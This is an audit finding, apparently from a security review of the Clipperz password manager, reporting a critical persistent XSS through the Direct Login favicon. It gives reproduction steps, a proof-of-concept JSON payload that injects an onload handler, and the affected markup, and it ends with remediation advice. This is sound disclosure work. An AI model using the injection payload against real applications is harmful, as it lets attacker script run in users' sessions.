63 lines
3.1 KiB
Plaintext
63 lines
3.1 KiB
Plaintext
CLP-01-015 Persistent XSS on Index Page via Direct Login Favicon (Critical)
|
|
|
|
Similar to the issue described in CLP-01-014, a persistent XSS can be
|
|
triggered using the Direct Login feature. Clipperz attempts to load the
|
|
favicon of the linked website and display its URL inside the src
|
|
attribute of an IMG element. An attacker can cause the bookmarklet to
|
|
deliver a maliciously prepared URL that, in conjunction with the favicon
|
|
display, leads to an XSS attack.
|
|
|
|
Note that this attack is capable of executing arbitrary attacker
|
|
controlled JavaScript right after the victim logged in, because the
|
|
vulnerable element is being shown on the index page. It is further
|
|
possible to create a malicious page that will fill the bookmarklet?s
|
|
textarea with arbitrary content. The victim would have no way to detect
|
|
that something was injected and will willingly copy & paste it into the
|
|
clippers application?s card creator form.
|
|
|
|
Steps to reproduce:
|
|
Copy malicious JSON into card editor for ?Direct Login?
|
|
Create the card
|
|
Logout
|
|
Log in again
|
|
Attacker?s JavaScript executes
|
|
|
|
Example JSON to inject the payload:
|
|
{"page": {"title": ""},
|
|
"form": {"attributes": {"action": "javascript://\"onload=alert(1)//",
|
|
"method": null},
|
|
"inputs": [{"type": "text",
|
|
"name": "username",
|
|
"value": ""},
|
|
{"type": "password",
|
|
"name": "password",
|
|
"value": ""}]},
|
|
"version": "0.2.3"}
|
|
|
|
Affected Markup in Clipperz application:
|
|
<img
|
|
id="6a103aa5ab36f0c34cebde816f468bfd9550ca5bbbce67470a0ec58ec7ea1a4b_faviconIMG"
|
|
src="data:application/octet-stream;charset=utf-8;base64,AAABAAEAFxcAAAEAGAD8BgAAFgAAACgAAAAXAAAALgAAAAEAGAAAAAAAAAAAABIXAAASFwAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo="
|
|
onload="alert(1)///favicon.ico""></td><td valign="top"><a
|
|
class="directLoginItemTitle">adadadsadsa</a></td><td align="right"
|
|
valign="top"><a
|
|
class="directLoginItemEditButton">show</a></td></tr></tbody></table></li><li
|
|
class=" "
|
|
id="a88d6fc245559afc38aee293fb59790233242dad2633ed61dcc110e2e61644c4"><table
|
|
border="0" cellpadding="0" cellspacing="0"><tbody><tr><td align="center"
|
|
valign="top" width="20"><img
|
|
id="a88d6fc245559afc38aee293fb59790233242dad2633ed61dcc110e2e61644c4_faviconIMG"
|
|
src="data:application/octet-stream;charset=utf-8;base64,AAABAAEAFxcAAAEAGAD8BgAAFgAAACgAAAAXAAAALgAAAAEAGAAAAAAAAAAAABIXAAASFwAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo="
|
|
onload="alert(1)///favicon.ico""></td><td valign="top"><a
|
|
class="directLoginItemTitle">unnamed record</a></td><td align="right"
|
|
valign="top"><a class="directLoginItemEditButton">show</a>
|
|
|
|
It must be ensured that any form of user controlled data is being
|
|
filtered and encoded properly. It has shown, that the JSON processing
|
|
for direct logins is a particularly vulnerable element of the Clipperz
|
|
application and deserves special attention. We believe, that the
|
|
bookmarklet is easily exposed to injection attacks and that the content
|
|
of the textarea for direct login data is a dangerous and easy to exploit
|
|
attack vector and needs to be treated as such by the Clipperz
|
|
application upon processing its data.
|